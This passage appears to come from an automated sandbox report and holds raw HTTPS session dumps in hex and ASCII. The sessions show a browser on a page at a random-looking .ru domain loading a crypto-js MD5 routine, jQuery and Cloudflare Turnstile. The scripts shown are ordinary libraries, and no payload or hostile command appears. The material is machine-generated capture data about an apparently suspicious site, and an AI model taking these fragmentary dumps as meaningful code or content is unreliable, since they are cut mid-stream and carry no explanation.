                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                                                                      Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e
                                                                                      Data Ascii: sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this.
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35
                                                                                      Data Ascii: m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[5


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.1649711151.101.130.1374437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:57 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                      Host: code.jquery.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:57 UTC613INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 89501
                                                                                      Server: nginx
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                      ETag: "28feccc0-15d9d"
                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Age: 1880384
                                                                                      Date: Thu, 09 Jan 2025 04:10:57 GMT
                                                                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740030-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2774, 0
                                                                                      X-Timer: S1736395858.937711,VS0,VE1
                                                                                      Vary: Accept-Encoding
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                      Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                      Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                      Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                      Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                      Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                      Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                      Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                      Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                      2025-01-09 04:10:57 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                      Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.1649713104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:57 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:58 UTC386INHTTP/1.1 302 Found
                                                                                      Date: Thu, 09 Jan 2025 04:10:57 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194a06d908c11-EWR
                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.1649714104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:58 UTC648OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:58 UTC471INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:58 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 47521
                                                                                      Connection: close
                                                                                      accept-ranges: bytes
                                                                                      last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                      access-control-allow-origin: *
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194a448100f47-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:10:58 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
